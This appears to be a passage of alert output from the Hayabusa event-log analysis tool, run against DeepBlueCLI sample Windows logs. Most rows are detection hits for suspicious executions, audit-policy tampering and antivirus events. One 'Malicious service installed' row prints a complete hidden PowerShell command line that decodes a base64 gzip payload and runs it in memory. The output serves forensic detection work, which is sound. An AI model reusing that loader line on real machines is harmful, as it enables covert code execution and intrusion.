0x1b293,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 00:28:28.043 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1b2fd,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:27.609 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1aae1 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1af2f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1aae1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:31:31.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 00:31:31.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:52:58.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 03:46:19.937 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 03:46:20.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 04:55:50.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: SYyGmEHvgHiGYApk : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:45:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,Relevant Anti-Virus 